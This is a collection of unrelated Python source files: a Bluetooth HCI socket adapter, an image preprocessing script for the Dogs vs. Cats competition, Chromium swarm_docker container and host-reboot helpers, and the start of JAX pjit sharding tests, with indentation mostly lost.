self._socket.bind((self.device_id,))
self._socket_poll_thread = threading.Thread(target=self._socket_poller, name='HCISocketPoller')
self._socket_poll_thread.setDaemon(True)
self._socket_poll_thread.start()
self.device = self.get_device_info()
def close(self):
self._socket.close()
def send_cmd(self, cmd, data):
arr = array.array('B', data)
fcntl.ioctl(self._socket.fileno(), cmd, arr)
return arr
def send_cmd_value(self, cmd, value):
fcntl.ioctl(self._socket.fileno(), cmd, value)
def write_buffer(self, data):
log.debug(data)
self._socket.send(data)
def _set_filter(self, data):
self._socket.setsockopt(socket.SOL_HCI, socket.HCI_FILTER, data)
def _socket_poller(self):
while self._keep_running:
data = self._socket.recv(1024) # blocking
self._on_data(data)
    # Adapter Info
def get_device_info(self):
# C hci_dev_info struct defined at https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n2382
hci_dev_info_struct = struct.Struct('=H 8s 6B L B 8B 3L 4I 10L')
request_dta = hci_dev_info_struct.pack(
self.device_id,
b'',
0, 0, 0, 0, 0, 0,
0,
0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
response_data = self.send_cmd(HCIGETDEVINFO, request_dta)
hci_dev_info = hci_dev_info_struct.unpack(response_data)
# Just extract a few parts for now
device_id = hci_dev_info[0]
device_name = hci_dev_info[1].split(b'\0',1)[0]
bd_address = hci_dev_info[2:8]
return Device(address=BDAddress(bd_address), name=device_name)
# -------------------------------------------------
# Adapter power control
def on(self):
self.send_cmd_value(HCIDEVUP, self.device_id)
def off(self):
self.send_cmd_value(HCIDEVDOWN, self.device_id)
# -------------------------------------------------
# Scanning
def set_scan_filter(self):
typeMask = 1 << HCI_EVENT_PKT
eventMask1 = (1 << EVT_CMD_COMPLETE) | (1 << EVT_CMD_STATUS)
eventMask2 = 1 << (EVT_LE_META_EVENT - 32)
opcode = 0
filter = struct.pack("<LLLH", typeMask, eventMask1, eventMask2, opcode)
self._set_filter(filter)
def set_scan_parameters(self):
len = 7
type = SCAN_TYPE_ACTIVE
        interval = 0x0010  # ms * 1.6
        window = 0x0010    # ms * 1.6
        own_addr = LE_PUBLIC_ADDRESS
        filter = FILTER_POLICY_NO_WHITELIST
        cmd = struct.pack("<BHBBHHBB", HCI_COMMAND_PKT, LE_SET_SCAN_PARAMETERS_CMD, len,
                          type, interval, window, own_addr, filter)
self.write_buffer(cmd)
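    # Illustrative note (added, not from the original source): the interval and
    # window values above are expressed in the BLE unit of 0.625 ms, which is
    # what the "ms * 1.6" comment encodes (value = milliseconds * 1.6). For
    # example, 0x0010 = 16, and 16 * 0.625 ms = 10 ms for both the scan
    # interval and the scan window.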
def set_scan_enable(self, enabled=False, filter_duplicates=False):
len = 2
enable = 0x01 if enabled else 0x00
dups = 0x01 if filter_duplicates else 0x00
cmd = struct.pack("<BHBBB", HCI_COMMAND_PKT, LE_SET_SCAN_ENABLE_CMD, len, enable, dups)
self.write_buffer(cmd)
# -------------------------------------------------
# Advertising
def set_advertising_filter(self):
typeMask = 1 << HCI_EVENT_PKT | (1 << HCI_ACLDATA_PKT)
eventMask1 = 1 << EVT_DISCONN_COMPLETE | (1 << EVT_CMD_COMPLETE) | (1 << EVT_CMD_STATUS)
eventMask2 = 1 << (EVT_LE_META_EVENT - 32)
opcode = 0
filter = struct.pack("<LLLH", typeMask, eventMask1, eventMask2, opcode)
self._set_filter(filter)
def set_advertise_enable(self, enabled):
cmd = struct.pack("<BHBB",
HCI_COMMAND_PKT,
LE_SET_ADVERTISE_ENABLE_CMD,
1, # cmd parameters length
0x01 if enabled else 0x00
)
self.write_buffer(cmd)
def set_advertising_parameter(self):
cmd = struct.pack("<BHB" + "H H 3B 6B B B",
HCI_COMMAND_PKT,
LE_SET_ADVERTISING_PARAMETERS_CMD,
15, # cmd parameters length
0x00a0, # min interval
0x00a0, # max interval
0x3, # adv type
0, # direct addr type
0, # direct addr type
0,0,0,0,0,0, # direct addr
0x07,
0x00
)
self.write_buffer(cmd)
def set_scan_response_data(self, data):
padded_data = memoryview(data).tolist()
padded_data.extend([0] * (31 - len(padded_data)))
cmd = struct.pack("<BHB" + "B31B",
HCI_COMMAND_PKT,
LE_SET_SCAN_RESPONSE_DATA_CMD,
32, # cmd parameters length
len(data),
*padded_data
)
self.write_buffer(cmd)
def set_advertising_data(self, data):
padded_data = memoryview(data).tolist()
padded_data.extend([0] * (31 - len(padded_data)))
        log.debug('adv data: {}'.format(data))
cmd = struct.pack("<BHB" + "B31B",
HCI_COMMAND_PKT,
LE_SET_ADVERTISING_DATA_CMD,
32, # cmd parameters length
len(data),
*padded_data
)
self.write_buffer(cmd)
# -------------------------------------------------
# Inbound event handler for all messages
def _handle_command_complete(self, data):
log.debug("EVT_CMD_COMPLETE")
# TODO: unpack based on: https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/lib/hci.h#n1853
if (data[5] << 8) + data[4] == LE_SET_SCAN_PARAMETERS_CMD:
if data[6] == HCI_SUCCESS:
                log.debug('LE Scan Parameters Set')
elif (data[5] << 8) + data[4] == LE_SET_SCAN_ENABLE_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Scan Enable Set')
elif (data[5] << 8) + data[4] == LE_SET_ADVERTISING_PARAMETERS_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Advertising Parameters Set')
elif (data[5] << 8) + data[4] == LE_SET_ADVERTISING_DATA_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Advertising Data Set')
elif (data[5] << 8) + data[4] == LE_SET_SCAN_RESPONSE_DATA_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Scan Response Data Set')
elif (data[5] << 8) + data[4] == LE_SET_ADVERTISE_ENABLE_CMD:
if data[6] == HCI_SUCCESS:
log.debug('LE Advertise Enable Set')
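    # Note (added for clarity): in a Command Complete event, bytes 4-5 carry
    # the originating opcode in little-endian order, which is why each branch
    # above rebuilds it as (data[5] << 8) + data[4] before comparing it with
    # the LE_SET_* command constants, and byte 6 holds the status code
    # (HCI_SUCCESS on success).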
def _handle_disconnection_complete(self, data):
log.debug("EVT_DISCONN_COMPLETE")
disconn_info = dict(
status=data[3],
handle=(data[5] << 8) + data[4],
reason=data[6]
)
log.debug(disconn_info)
def _handle_meta_event(self, hci_packet):
log.debug("EVT_LE_META_EVENT")
if hci_packet.subevent_code == EVT_LE_ADVERTISING_REPORT:
log.debug('LE Advertising Report')
if self.on_advertising_data:
advertisement = AdvertisingDataConverters.from_hcipacket(hci_packet)
self.on_advertising_data(advertisement)
else:
log.warning("TODO: unhandled HCI Meta Event packet, type={}".format(hci_packet))
def _on_data(self, data):
log.debug("----------------------------------------------------------------------")
log.debug("Socket data: len={}, data={}".format(len(data), hex_string(data)))
if data[0] == HCI_EVENT_PKT:
hci_event_packet = parse_hci_event_packet(data[1:-1])
log.debug(hci_event_packet)
if data[1] == EVT_CMD_COMPLETE:
self._handle_command_complete(data)
elif data[1] == EVT_DISCONN_COMPLETE:
self._handle_disconnection_complete(data)
elif data[1] == EVT_LE_META_EVENT:
self._handle_meta_event(hci_event_packet)
else:
log.warning("TODO: unhandled HCI Event packet, type={}".format(hci_event_packet))
else:
log.warning("TODO: Unhandled HCI packet, type={}".format(data[0]))
def start_scanning(self):
self.set_scan_enable(False)
self.set_scan_filter()
self.set_scan_parameters()
self.set_scan_enable(True, False)
def stop_scanning(self):
self.set_scan_enable(False)
def start_advertising(self, advertisement, scan_response=None):
self.set_advertising_filter()
self.set_advertise_enable(False)
self.set_advertising_parameter()
self.set_advertising_data(AdvertisingDataConverters.from_advertisement(advertisement))
if scan_response:
log.warning("TODO: support setting scan response")
# self.set_scan_response_data(scan_response_data.data)
self.set_advertise_enable(True)
def stop_advertising(self):
self.set_advertise_enable(False)
|
preprocess.py
|
"""
Preprocess image data for Dogs vs. Cats competition
https://www.kaggle.com/gauss256
DESCRIPTION
Most solutions for this competition will need to deal with the fact that the
training and test images are of varying sizes and aspect ratios, and were taken
under a variety of lighting conditions. It is typical in cases like this to
preprocess the images to make them more uniform.
By default this script will normalize the image luminance, convert to
grayscale, and resize to a square image of side length SIZE (128 below; 224
for compatibility with ImageNet models). The resizing preserves the aspect
ratio and adds gray bars as necessary to make the images square. The resulting
images are stored under BASE_DIR in a folder named after the size, e.g.
data/input/128.
The location of the input and output files, and the size of the images, can be
controlled through the processing parameters below.
INSTALLATION
This script has been tested on Ubuntu 14.04 using the Anaconda distribution for
Python 3.5. The only additional requirement is for the pillow library for image
manipulation which can be installed via:
conda install pillow
"""
import glob
from multiprocessing import Process
import os
import re
import numpy as np
import PIL
from PIL import Image
# Processing parameters
SIZE = 128  # 28 for MNIST; 224 for ImageNet model compatibility
TEST_DIR = 'data/input/raw/test/'
TRAIN_DIR = 'data/input/raw/train/'
BASE_DIR = 'data/input/'
def natural_key(string_):
"""
Define sort key that is integer-aware
"""
return [int(s) if s.isdigit() else s for s in re.split(r'(\d+)', string_)]
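# Illustrative helper (added for this write-up, not part of the original
# script): shows the effect of natural_key on numbered filenames, which would
# otherwise sort lexicographically ('cat.10.jpg' before 'cat.2.jpg').
def _natural_key_example():
    """Returns ['cat.1.jpg', 'cat.2.jpg', 'cat.10.jpg']."""
    return sorted(['cat.10.jpg', 'cat.2.jpg', 'cat.1.jpg'], key=natural_key)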
def norm_image(img):
"""
Normalize PIL image
Normalizes luminance to (mean,std)=(0,1), and applies a [1%, 99%] contrast stretch
"""
img_y, img_b, img_r = img.convert('YCbCr').split()
img_y_np = np.asarray(img_y).astype(float)
img_y_np /= 255
img_y_np -= img_y_np.mean()
img_y_np /= img_y_np.std()
scale = np.max([np.abs(np.percentile(img_y_np, 1.0)),
np.abs(np.percentile(img_y_np, 99.0))])
img_y_np = img_y_np / scale
img_y_np = np.clip(img_y_np, -1.0, 1.0)
img_y_np = (img_y_np + 1.0) / 2.0
img_y_np = (img_y_np * 255 + 0.5).astype(np.uint8)
img_y = Image.fromarray(img_y_np)
img_ybr = Image.merge('YCbCr', (img_y, img_b, img_r))
img_nrm = img_ybr.convert('RGB')
return img_nrm
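# Note (added for clarity, not in the original): after standardizing the Y
# channel, norm_image clips it to +/- the larger of the 1st/99th percentile
# magnitudes and maps that range linearly onto [0, 255], so at most about 1%
# of pixels at each extreme saturate while the rest keep their relative
# contrast.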
def resize_image(img, size):
"""
Resize PIL image
    Resizes image to be square with side length size. Pads with gray if needed.
"""
# Resize
n_x, n_y = img.size
if n_y > n_x:
n_y_new = size
n_x_new = int(size * n_x / n_y + 0.5)
else:
n_x_new = size
n_y_new = int(size * n_y / n_x + 0.5)
img_res = img.resize((n_x_new, n_y_new), resample=PIL.Image.BICUBIC)
# Pad the borders to create a square image
img_pad = Image.new('RGB', (size, size), (128, 128, 128))
ulc = ((size - n_x_new) // 2, (size - n_y_new) // 2)
img_pad.paste(img_res, ulc)
return img_pad
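# Worked example (illustrative only): for a 300x200 landscape input and
# size=128, the else branch gives n_x_new = 128 and
# n_y_new = int(128 * 200 / 300 + 0.5) = 85, and the paste corner is
# ulc = ((128 - 128) // 2, (128 - 85) // 2) = (0, 21), leaving 21-22 px gray
# bars above and below the resized image.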
def gray_image(img):
return img.convert('L')
def prep_images(paths, out_dir):
"""
Preprocess images
Reads images in paths, and writes to out_dir
"""
for count, path in enumerate(paths):
if count % 100 == 0:
print(path)
img = Image.open(path)
img_nrm = norm_image(img)
img_gry = gray_image(img_nrm)
img_res = resize_image(img_gry, SIZE)
basename = os.path.basename(path)
path_out = os.path.join(out_dir, basename)
img_res.save(path_out)
def main():
"""Main program for running from command line"""
# Get the paths to all the image files
train_cats = sorted(glob.glob(os.path.join(TRAIN_DIR, 'cat*.jpg')), key=natural_key)
train_dogs = sorted(glob.glob(os.path.join(TRAIN_DIR, 'dog*.jpg')), key=natural_key)
test_all = sorted(glob.glob(os.path.join(TEST_DIR, '*.jpg')), key=natural_key)
# Make the output directories
base_out = os.path.join(BASE_DIR, '{}'.format(SIZE))
train_dir_out = os.path.join(base_out, 'train')
test_dir_out = os.path.join(base_out, 'test')
os.makedirs(train_dir_out, exist_ok=True)
os.makedirs(test_dir_out, exist_ok=True)
# Preprocess the training files
procs = dict()
procs[1] = Process(target=prep_images, args=(train_cats, train_dir_out, ))
procs[1].start()
procs[2] = Process(target=prep_images, args=(train_dogs, train_dir_out, ))
procs[2].start()
procs[3] = Process(target=prep_images, args=(test_all, test_dir_out, ))
procs[3].start()
procs[1].join()
procs[2].join()
procs[3].join()
if __name__ == '__main__':
main()
|
main_helpers.py
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import contextlib
import datetime
import hashlib
import json
import logging
import logging.handlers
import os
import socket
import subprocess
import sys
import threading
import time
from infra.libs.service_utils import daemon
from infra.services.swarm_docker import containers
_REGISTRY_URL = 'gcr.io'
# Location of file that will prevent this script from spawning new containers.
# Useful when draining a host in order to debug failures. BOT_SHUTDOWN_FILE
# drains all containers, but individual containers can also be drained using
# container's shutdown file as returned by its descriptor class.
BOT_SHUTDOWN_FILE = '/b/shutdown.stamp'
# Similar to BOT_SHUTDOWN_FILE, but triggers a host reboot after all containers
# have been drained.
BOT_REBOOT_FILE = '/b/reboot.stamp'
# Minimum time a host must be up before it can be restarted again.
_MIN_HOST_UPTIME = 60
# Defined in
# https://chromium.googlesource.com/infra/infra/+/master/build/packages/swarm_docker.yaml
_CIPD_VERSION_FILE = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', 'CIPD_VERSION.json'))
def get_cipd_version(): # pragma: no cover
if not os.path.exists(_CIPD_VERSION_FILE):
logging.warning('Unable to find cipd version file %s', _CIPD_VERSION_FILE)
return None
try:
with open(_CIPD_VERSION_FILE) as f:
d = json.load(f)
return d.get('instance_id')
except (IOError, ValueError):
logging.exception('Unable to read cipd version file %s', _CIPD_VERSION_FILE)
return None
def fuzz_max_uptime(max_uptime):
"""Returns max_uptime fuzzed by up to 20% of the original value."""
fqdn = socket.getfqdn()
# Don't use the built-in hash function since that's not deterministic across
# different processes.
fqdn_hash = hashlib.md5(fqdn).hexdigest()
fuzz_amount = int(fqdn_hash, 16) % int(max_uptime * 0.2)
return max_uptime + fuzz_amount
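# Worked example (illustrative only, not part of the original module): with the
# default --max-host-uptime of 60 * 24 = 1440 minutes, the fuzz window is
# int(1440 * 0.2) = 288, so fuzz_amount lands in [0, 287] and each host gets a
# fixed, hostname-derived reboot threshold between 1440 and 1727 minutes. The
# hostname below is made up; .encode() is used so the sketch also runs on
# Python 3.
def _example_fuzzed_uptime():  # pragma: no cover
  fqdn_hash = hashlib.md5('swarm42.example.com'.encode('utf-8')).hexdigest()
  return 1440 + int(fqdn_hash, 16) % int(1440 * 0.2)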
def get_host_uptime():
"""Returns host uptime in minutes."""
with open('/proc/uptime') as f:
uptime = float(f.readline().split()[0])
return uptime / 60
def update_docker(canary, version='18.06.3~ce~3-0~ubuntu'): # pragma: no cover
"""Update the docker package prior to reboot.
This will automatically keep the docker package up to date and running prior
to reboot will ensure that no containers are running, so no disruptions. This
will also remove older docker packages (docker-engine) automatically.
If the bot is a docker_canary, then the latest version of docker-ce will be
installed, otherwise the pinned version= version will be installed.
Args:
canary: (bool) If this is a canary host or not.
version: (str) The version of docker-ce to ensure is installed.
"""
# Not doing a lot of dpkg/apt-cache checking here as the runtime to just try
# an install is only 1.1 seconds.
try:
subprocess.check_call(['/usr/bin/apt-get', 'update'])
except subprocess.CalledProcessError:
# We don't care enough to abort reboot here, only if install fails.
logging.exception('Unable to apt-get update.')
if canary:
package_with_version = 'docker-ce'
else:
package_with_version = 'docker-ce=%s' % version
try:
subprocess.check_call(['/usr/bin/apt-get', 'install', '-y',
package_with_version])
except subprocess.CalledProcessError:
logging.exception('Unable to install/upgrade docker-ce to %s.', version)
return False
return True
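# For example (added for illustration, not part of the original module), on a
# non-canary host update_docker(canary=False) effectively runs:
#   apt-get update
#   apt-get install -y docker-ce=18.06.3~ce~3-0~ubuntu
# while a canary host installs the unpinned 'docker-ce' package instead.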
def reboot_host(canary=False, skip_update=False): # pragma: no cover
if not skip_update and not update_docker(canary):
logging.warning('Not rebooting, something went wrong.')
return
# This script runs as root.
try:
subprocess.check_call(['/sbin/reboot'])
except subprocess.CalledProcessError:
logging.exception('Unable to reboot host.')
class FlockTimeoutError(Exception):
pass
@contextlib.contextmanager
def flock(lock_file, retries=20, sleep_duration=3): # pragma: no cover
logging.debug('Acquiring file lock on %s...', lock_file)
i = 0
while True:
try:
with daemon.flock(lock_file):
logging.debug('Lock acquired on %s.', lock_file)
try:
yield
finally:
logging.debug('Releasing lock on %s.', lock_file)
break
except daemon.LockAlreadyLocked:
if i == retries - 1:
raise FlockTimeoutError()
else:
logging.debug('Lock on %s busy; sleeping for %d seconds.',
lock_file, sleep_duration)
i += 1
time.sleep(sleep_duration)
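# Minimal usage sketch (added for illustration; the lock path is hypothetical):
# flock() retries daemon.flock() up to `retries` times, sleeping
# `sleep_duration` seconds between attempts (roughly 60 s total by default),
# and raises FlockTimeoutError if the lock never frees.
#
#   with flock('/b/swarm_docker.lock'):
#     ...  # exclusive section, e.g. inspecting or creating a container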
def reboot_gracefully(args, running_containers):
"""Reboot the host and attempt to gracefully stop running containers.
Returns:
True if reboot sequence has been started. Callers should not spawn new
containers. Actual reboot may not be triggered due to running tasks.
"""
uptime = get_host_uptime()
fuzzed_max_host_uptime = fuzz_max_uptime(args.max_host_uptime)
mins_since_scheduled_reboot = uptime - fuzzed_max_host_uptime
if mins_since_scheduled_reboot > 0:
logging.debug('Host uptime over fuzzed max uptime (%d > %d).',
uptime, fuzzed_max_host_uptime)
else:
return False
if running_containers:
if mins_since_scheduled_reboot > args.reboot_grace_period:
logging.warning(
'Drain exceeds grace period of %d min. Rebooting host now '
'despite %d running containers.', args.reboot_grace_period,
len(running_containers))
reboot_host(args.canary)
else:
logging.debug(
'Still %d containers running. Shutting them down first.',
len(running_containers))
for c in running_containers:
c.kill_swarming_bot()
else:
logging.debug('No running containers. Rebooting host now.')
reboot_host(args.canary)
return True
def launch_containers(
docker_client, container_descriptors, args): # pragma: no cover
rebooting_host = os.path.exists(BOT_REBOOT_FILE)
draining_host = os.path.exists(BOT_SHUTDOWN_FILE)
draining_container_descriptors = [
cd for cd in container_descriptors if os.path.exists(cd.shutdown_file)
]
if draining_host:
logging.info(
'In draining state due to existence of %s. No new containers will be '
'created.', BOT_SHUTDOWN_FILE)
elif rebooting_host:
logging.info(
'In draining state due to existence of %s. No new containers will be '
'created and host will be restarted.', BOT_REBOOT_FILE)
elif draining_container_descriptors:
logging.info(
'Draining containers %s due to existence of files: %s. They will not '
'be restarted automatically.',
[cd.name for cd in draining_container_descriptors],
[cd.shutdown_file for cd in draining_container_descriptors])
running_containers = docker_client.get_running_containers()
if (not draining_host and not rebooting_host and args.max_host_uptime
and reboot_gracefully(args, running_containers)):
return
# Fetch the image from the registry if it's not present locally.
image_url = (_REGISTRY_URL + '/' + args.registry_project + '/' +
args.image_name)
if not docker_client.has_image(image_url):
logging.debug('Local image missing. Fetching %s ...', image_url)
docker_client.login(_REGISTRY_URL, args.credentials_file)
docker_client.pull(image_url)
logging.debug('Image %s fetched.', image_url)
# Cleanup old containers that were stopped from a previous run.
# TODO(bpastene): Maybe enable auto cleanup with the -rm option?
docker_client.delete_stopped_containers()
# Send SIGTERM to bots in containers that have been running for too long, or
# all of them regardless of uptime if draining. For Android containers (see
# infra.services.android_swarm package), some containers may go missing due
# to associated devices missing, so we need to examine *all* containers here
# instead of doing that inside the per-container flock below.
current_cipd_version = get_cipd_version()
if draining_host or rebooting_host:
for c in running_containers:
c.kill_swarming_bot()
if rebooting_host and not running_containers:
os.remove(BOT_REBOOT_FILE)
reboot_host(args.canary)
else:
for cd in draining_container_descriptors:
c = docker_client.get_container(cd)
if c is not None:
c.kill_swarming_bot()
docker_client.stop_old_containers(
running_containers, args.max_container_uptime)
# Also stop any outdated container.
if current_cipd_version is not None:
for c in running_containers:
if c.labels.get('cipd_version') != current_cipd_version:
logging.debug(
'Container %s is out of date. Shutting it down.', c.name)
c.kill_swarming_bot()
# Make sure all requested containers are running.
def _create_container(container_desc):
try:
with flock(container_desc.lock_file):
c = docker_client.get_container(container_desc)
if c is None:
labels = {}
# Attach current cipd version to container's metadata so it can
# be restarted if version changes.
if current_cipd_version is not None:
labels['cipd_version'] = current_cipd_version
docker_client.create_container(
container_desc, image_url, args.swarming_server, labels)
elif c.state == 'paused':
# Occasionally a container gets stuck in the paused state. Since
# the logic here is thread safe, this shouldn't happen, so
# explicitly unpause them before continuing.
# TODO(bpastene): Find out how/why.
logging.warning('Unpausing container %s.', c.name)
c.unpause()
else:
logging.debug('Nothing to do for container %s.', c.name)
except FlockTimeoutError:
logging.error(
'Timed out while waiting for lock on container %s.',
container_desc.name)
threads = []
docker_client.set_num_configured_containers(len(container_descriptors))
for cd in container_descriptors:
# TODO(sergiyb): Remove should_create_container logic from this generic
# container management loop and move it outside of the launch_container
# function as it's specific to Android devices only and thus should only
# be in the android_docker package.
if (cd.should_create_container() and
cd not in draining_container_descriptors):
# Split this into threads so a blocking container doesn't block the
# others (and also for speed!)
t = threading.Thread(target=_create_container, args=(cd,))
threads.append(t)
t.start()
for t in threads:
t.join()
def add_launch_arguments(parser): # pragma: no cover
def max_uptime(value):
value = int(value)
if value < _MIN_HOST_UPTIME and value != 0:
raise argparse.ArgumentTypeError(
          '--max-host-uptime must be >= %d minutes or zero' % _MIN_HOST_UPTIME)
return value
parser.add_argument(
'-c', '--canary', action='store_true', default=False,
help='Run this as a canary bot.')
parser.add_argument(
'--max-container-uptime', type=int, default=60 * 4,
help='Max uptime of a container, in minutes.')
parser.add_argument(
'--reboot-grace-period', type=int, default=60 * 4,
help='How long to wait (in minutes) for swarming bots to gracefully '
'shutdown before triggering a host reboot. Should be at least as '
'long as the longest expected task run time. Defaults to 4 hours.')
parser.add_argument(
'--image-name', default='swarm_docker:latest',
help='Name of docker image to launch from.')
parser.add_argument(
'--swarming-server', default='https://chromium-swarm.appspot.com',
help='URL of the swarming server to connect to.')
parser.add_argument(
'--registry-project', default='chromium-container-registry',
help='Name of gcloud project id for the container registry.')
parser.add_argument(
'--credentials-file',
default='/creds/service_accounts/'
'service-account-container_registry_puller.json',
help='Path to service account json file used to access the gcloud '
'container registry.')
parser.add_argument(
'--max-host-uptime', type=max_uptime, default=60 * 24,
help='Max uptime of the host, in minutes. A value of zero indicates the '
'host will never be rebooted automatically.')
def configure_logging(log_filename, log_prefix, verbose): # pragma: no cover
logger = logging.getLogger()
logger.setLevel(logging.DEBUG if verbose else logging.WARNING)
log_fmt = logging.Formatter(
      '%(asctime)s.%(msecs)03d %(levelname)s ' + log_prefix + ' %(message)s',
datefmt='%y%m%d %H:%M:%S')
file_handler = logging.handlers.RotatingFileHandler(
'/var/log/chrome-infra/%s' % log_filename,
maxBytes=10 * 1024 * 1024, backupCount=5)
file_handler.setFormatter(log_fmt)
logger.addHandler(file_handler)
stdout_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stdout_handler)
# Quiet some noisy modules.
cmd_helper_logger = logging.getLogger('devil.utils.cmd_helper')
cmd_helper_logger.setLevel(logging.ERROR)
urllib3_logger = logging.getLogger('requests.packages.urllib3.connectionpool')
urllib3_logger.setLevel(logging.WARNING)
# urllib3's module path is different when invoked via vpython.
# TODO(crbug.com/977627): Remove the old path when we tear out infra VENV
# support.
vypy_urllib3_logger = logging.getLogger('urllib3.connectionpool')
vypy_urllib3_logger.setLevel(logging.WARNING)
@contextlib.contextmanager
def main_wrapper(): # pragma: no cover
if sys.platform != 'linux2':
print('Only supported on linux.', file=sys.stderr)
sys.exit(1)
try:
yield
except containers.FrozenEngineError:
logging.exception('Docker engine frozen, triggering host reboot.')
# Skipping updates since something is very wrong with docker here.
reboot_host(skip_update=True)
except Exception as e:
logging.exception('Exception:')
raise e
|
pjit_test.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import pjit, pjit_p, with_sharding_constraint, SpecSync
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client
from jax._src.util import prod, curry, unzip2
from jax.config import config
config.parse_flags_with_absl()
def setUpModule():
if jax.default_backend() not in {'gpu', 'tpu'}:
raise unittest.SkipTest("pjit only supports GPU and TPU backends")
jtu.set_spmd_lowering_flag(True)
def tearDownModule():
jtu.restore_spmd_lowering_flag()
@curry
def check_1d_2d_mesh(f, set_mesh):
return parameterized.named_parameters(
{"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
for name, mesh, resources in (
("2", (("x", 2),), "x"),
("2x1", (("x", 2), ("y", 1)), ("x", "y")),
("2x2", (("x", 2), ("y", 2)), ("x", "y")),
))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
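# Note (added for clarity): check_1d_2d_mesh expands a test method into three
# named cases (suffixes _2, _2x1 and _2x2), passing the mesh shape and the
# axis-resource names ('x' or ('x', 'y')) as the `mesh` and `resources`
# arguments; with set_mesh=True it also wraps the test in
# jtu.with_mesh_from_kwargs so that mesh is active while the test body runs.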
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
@jtu.with_mesh([('x', 1)])
def testDeviceBufferAval(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
def f(x):
return x
shape = (2, 2)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x)
expected = x
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 1)
self.assertAllClose(
actual.device_buffers[0].to_py(), expected, check_dtypes=False)
# Repro for a bug on device_buffer aval
_ = repr(actual.device_buffers)
@jtu.with_mesh([('x', 2)])
def testBasic1D(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testBasic2D(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testTwoMeshAxisSharding(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
actual = f(x, x + 1)
expected = x @ (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testBufferDonation(self):
@partial(pjit,
in_axis_resources=P('x'),
out_axis_resources=P('x'),
donate_argnums=0)
def f(x, y):
return x + y
shard = pjit(lambda x: x, in_axis_resources=P('x'),
out_axis_resources=P('x'))
x = shard(jnp.ones((2, 5)) * 4)
y = shard(jnp.ones((2, 5)) * 2)
expected = x + y
self.assertAllClose(f(x, y), expected)
self.assertNotDeleted(y)
self.assertDeleted(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraint(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
y = x + 1
y = with_sharding_constraint(y, P('x', 'y'))
return y * 2
shape = (8, 8)
x = np.arange(prod(shape)).reshape(shape)
expected = (x + 1) * 2
actual = f(x)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
